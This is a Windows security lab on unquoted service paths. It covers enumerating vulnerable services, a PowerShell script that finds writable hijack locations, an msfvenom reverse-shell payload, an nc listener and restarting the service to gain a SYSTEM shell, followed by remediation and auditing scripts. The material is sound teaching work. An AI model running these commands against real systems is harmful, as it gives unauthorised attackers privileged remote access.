Objective: Understand how to identify and exploit unquoted service paths in Windows to execute malicious payloads with elevated privileges, and learn mitigation techniques to secure service configurations.
Scenario: Unquoted service paths in Windows can allow attackers to execute arbitrary code if the path to a service executable contains spaces and is not enclosed in quotes. Attackers exploit this by placing a malicious executable in a directory along the unquoted path, which only works when they have write access to one of those directories and the service runs with higher privileges than they do. Your task is to identify unquoted service paths, exploit them, and secure the system to prevent such vulnerabilities.
Lab Setup
- Environment:
- A Windows system with a service configured with an unquoted service path.
- Tools Required:
- Command Prompt or PowerShell.
- Access to the sc command.
- A tool to create executables (e.g., msfvenom, PowerShell).
Lab Steps
Step 1: Identify Unquoted Service Paths
List all services (without state= all, sc query only shows services that are currently running):
sc query state= all
Check the configuration of a specific service for an unquoted path:
sc qc <service_name>
Example output (abbreviated):
SERVICE_NAME: ExampleService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Example Service\service.exe
SERVICE_START_NAME : LocalSystem
If the BINARY_PATH_NAME contains spaces and is not enclosed in quotes, the service is misconfigured. It is exploitable only if you can write to one of the directories that precede a space in the path; the SERVICE_START_NAME tells you which account (here LocalSystem, i.e. SYSTEM) your payload would run as.
Step 2: Exploit the Unquoted Service Path
Identify possible injection points:
When the SCM starts the service it hands the unquoted string to CreateProcess, which treats each space as a possible end of the executable name. For the above example it tries, in order:
C:\Program.exe
C:\Program Files\Example.exe
C:\Program Files\Example Service\service.exe
The remainder of the string is passed to whichever file is found first as its command-line arguments, so a payload at C:\Program.exe is started with Files\Example Service\service.exe as its arguments and must not choke on them. On a default install the root of C:\ and C:\Program Files are not writable by standard users, so the candidate you can actually use is normally the one inside a vendor directory with a permissive ACL.
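The enumeration in Step 1 and the search-order reasoning above, as an added PowerShell example that is not part of the original lab. It lists every unquoted service path on the host, derives the candidate locations CreateProcess would try in order, and probes whether the current user can drop a file in each candidate's directory. The function names are mine; the script makes no assumptions about service names and runs as whatever user invokes it.

```powershell
# Added example (not part of the original lab). Enumerate unquoted service paths,
# compute the hijack candidates in CreateProcess search order, and test each
# candidate directory for write access as the current user.

function Get-ServiceExePath {
    param([Parameter(Mandatory)][string]$PathName)
    # Return only the executable part of a service command line; anything after
    # the first ".exe" token is treated as arguments. Quoted paths are unquoted.
    if ($PathName -match '^"(?<exe>[^"]+)"')       { return $Matches['exe'] }
    if ($PathName -match '^(?<exe>.*?\.exe)(\s|$)') { return $Matches['exe'] }
    return $PathName
}

function Get-UnquotedServicePath {
    # Services whose executable path is unquoted, contains whitespace and lives
    # outside \Windows\ (system services are quoted or in locked-down folders).
    Get-CimInstance -ClassName Win32_Service | Where-Object {
        $_.PathName -and
        $_.PathName -notmatch '^"' -and
        (Get-ServiceExePath $_.PathName) -match '\s' -and
        $_.PathName -notmatch '^[A-Za-z]:\\Windows\\'
    }
}

function Get-HijackCandidate {
    param([Parameter(Mandatory)][string]$ExePath)
    # CreateProcess tries each space as the end of the executable name, so
    # "C:\Program Files\Example Service\service.exe" yields C:\Program.exe,
    # C:\Program Files\Example.exe and finally the real binary.
    $idx = $ExePath.IndexOf(' ')
    while ($idx -ge 0) {
        $ExePath.Substring(0, $idx) + '.exe'
        $idx = $ExePath.IndexOf(' ', $idx + 1)
    }
    $ExePath
}

function Test-DirectoryWritable {
    param([Parameter(Mandatory)][string]$Directory)
    # Actually try to create and delete a scratch file: reading the ACL alone
    # misses inherited/deny entries and group membership. Nothing is left behind
    # when the delete succeeds.
    if (-not (Test-Path -LiteralPath $Directory -PathType Container)) { return $false }
    $probe = Join-Path $Directory ([IO.Path]::GetRandomFileName())
    try {
        [IO.File]::WriteAllText($probe, '')
        Remove-Item -LiteralPath $probe -Force
        return $true
    } catch {
        return $false
    }
}

foreach ($svc in Get-UnquotedServicePath) {
    "`n[{0}] account={1} start={2}" -f $svc.Name, $svc.StartName, $svc.StartMode
    "  path: $($svc.PathName)"
    $exe = Get-ServiceExePath $svc.PathName
    foreach ($c in Get-HijackCandidate -ExePath $exe) {
        # The last candidate is the real binary; a writable directory there means
        # the binary itself could be replaced, a separate but related weakness.
        $state = if (Test-DirectoryWritable (Split-Path -Parent $c)) { 'WRITABLE' } else { 'no-write' }
        '  -> {0,-9} {1}' -f $state, $c
    }
}
```

A candidate marked WRITABLE whose service runs as LocalSystem with AUTO_START is the one to use in the steps that follow; the account and start mode columns tell you what you would gain and whether a reboot alone would trigger it.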
Create a malicious payload using msfvenom or another tool (if you generate it on the attack machine, transfer the file to the target afterwards):
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<your_ip> LPORT=<your_port> -f exe -o C:\Program.exe
Replace <your_ip> and <your_port> with your attack machine's IP and listening port. A plain executable started by the SCM never reports a service status, so the SCM logs error 1053 and terminates it after roughly 30 seconds; if your shell dies at that point, generate the payload with -f exe-service instead, which wraps it in a minimal service stub.
On your attack machine, start a listener before triggering the service so the callback has something to connect to:
nc -lvnp <your_port>
Place the malicious executable in the highest-priority location you can write to (e.g., C:\Program.exe if the root of C:\ is writable, otherwise the next candidate down the list).
Restart the vulnerable service to trigger the exploit:
net stop <service_name>
net start <service_name>
Stopping and starting require the corresponding rights on the service object, which a standard user often lacks. Because the service is AUTO_START, a reboot (or simply waiting for the next one) triggers the hijack as well.
Verify that the reverse shell connects and that you have elevated privileges: whoami should report nt authority\system for a service that runs as LocalSystem.
Step 3: Replace or Inject Malicious Executables
If you have write access to an intermediate directory on the service path, drop the payload there under the name Windows will look for; if you can write to the directory of the service binary itself, the binary can be replaced outright. Check the ACL of each candidate directory with icacls before copying.
copy malicious_payload.exe "C:\Program Files\Example.exe"
Restart the service to trigger the exploit:
net stop <service_name>
net start <service_name>
Solution
Explanation:
- When a service path is unquoted, the SCM's call to CreateProcess probes a file at every space in the path before reaching the real binary, so an attacker who can write to one of those locations gets their executable run instead.
- Exploiting this misconfiguration yields elevated privileges when the service runs as SYSTEM or another privileged account, which is the common case for third-party services.
Prevention:
Quote Service Paths:
Edit the service configuration to enclose the path in quotes. The shell consumes the outer quotes, so the quotes that must be stored are escaped with a backslash (from PowerShell, call sc.exe explicitly, because sc alone resolves to the Set-Content alias):
sc config <service_name> binPath= "\"C:\Program Files\Example Service\service.exe\""
Run sc qc <service_name> afterwards and confirm that BINARY_PATH_NAME now begins with a quote; a binPath= with unescaped quotes silently stores the path unquoted again.
Audit Services:
Regularly check for unquoted service paths using tools like PowerShell. Matching on a bare space also flags correctly quoted paths and paths whose only spaces sit in the arguments, so exclude paths that start with a quote and test only the part before the first .exe:
Get-CimInstance -ClassName Win32_Service | Where-Object { $_.PathName -notmatch '^"' -and ($_.PathName -split '\.exe')[0] -match '\s' } | Select-Object Name, StartMode, StartName, PathName
Restrict File System Permissions:
Ensure only administrators can write to the directories along the service path, including the vendor directory that holds the binary; inspect them with icacls and remove Modify/Write grants to Users, Authenticated Users or Everyone.
Monitor and Log Service Activity:
Use the System event log in Windows Event Viewer to track changes to services and unexpected service restarts: Service Control Manager event 7045 records a newly installed service, 7040 a changed start type, and 7036 every transition to running or stopped.
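The remediation and audit steps above, as an added PowerShell example that is not part of the original lab. Repair-UnquotedServicePath quotes only the executable portion of the path (arguments, if any, are preserved), applies the change through the Win32_Service Change method so there is no sc.exe quote-escaping to get wrong, and reads the configuration back to verify it. Get-ServiceConfigChangeEvent pulls the Service Control Manager events an auditor would review. Both function names are mine, the script must run elevated, and ExampleService is the lab's hypothetical service name.

```powershell
# Added example (not part of the original lab). Quote an unquoted service path,
# verify the stored configuration, and list recent SCM events. Run elevated.

function Repair-UnquotedServicePath {
    [CmdletBinding(SupportsShouldProcess)]
    param([Parameter(Mandatory)][string]$Name)

    $svc = Get-CimInstance -ClassName Win32_Service -Filter "Name='$Name'"
    if (-not $svc) { throw "Service '$Name' not found" }
    $path = $svc.PathName

    if ($path -match '^"') { Write-Verbose "$Name is already quoted"; return $path }

    # Split "C:\Program Files\Example Service\service.exe -arg" into the
    # executable and its arguments; only the executable gets quoted.
    if ($path -notmatch '^(?<exe>.*?\.exe)(?<rest>\s.*)?$') {
        throw "Cannot locate the executable in '$path'"
    }
    $exe       = $Matches['exe']
    $arguments = $Matches['rest']   # $null when the service takes no arguments
    if ($exe -notmatch '\s') { Write-Verbose "$Name has no space in its executable path"; return $path }

    $fixed = '"' + $exe + '"' + $arguments

    if ($PSCmdlet.ShouldProcess($Name, "set PathName to $fixed")) {
        # Win32_Service.Change wraps ChangeServiceConfig, the same API sc.exe
        # config uses, but takes the new path as a plain string.
        $r = Invoke-CimMethod -InputObject $svc -MethodName Change -Arguments @{ PathName = $fixed }
        if ($r.ReturnValue -ne 0) { throw "Change failed with return code $($r.ReturnValue)" }

        # Do not trust the return code: read the configuration back and compare.
        $after = (Get-CimInstance -ClassName Win32_Service -Filter "Name='$Name'").PathName
        if ($after -ne $fixed) { throw "Verification failed; PathName is now: $after" }
        return $after
    }
}

function Get-ServiceConfigChangeEvent {
    param([int]$MaxEvents = 20)
    # 7045: service installed, 7040: start type changed, 7036: running/stopped.
    Get-WinEvent -FilterHashtable @{
        LogName      = 'System'
        ProviderName = 'Service Control Manager'
        Id           = 7045, 7040, 7036
    } -MaxEvents $MaxEvents | Select-Object TimeCreated, Id, Message
}

# Usage: dry run first, then apply, then look at what the SCM logged.
# Replace ExampleService with a real service name on your lab host.
Repair-UnquotedServicePath -Name 'ExampleService' -WhatIf
Repair-UnquotedServicePath -Name 'ExampleService' -Verbose
Get-ServiceConfigChangeEvent -MaxEvents 10
```

The change takes effect the next time the service starts; stop and start it (or reboot) and rerun sc qc to confirm the quoted path is what the SCM now uses.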
Testing and Verification
Recheck the service configuration after mitigation to ensure the path is quoted:
sc qc <service_name>
Attempt to place a malicious executable in the previously vulnerable locations and verify that it is no longer executed.
Document all changes and ensure compliance with security policies.
Reflection
This exercise demonstrates the risks associated with unquoted service paths in Windows and provides practical steps to exploit and secure such configurations. By completing this lab, you’ve gained valuable insights into detecting and mitigating this common Windows vulnerability.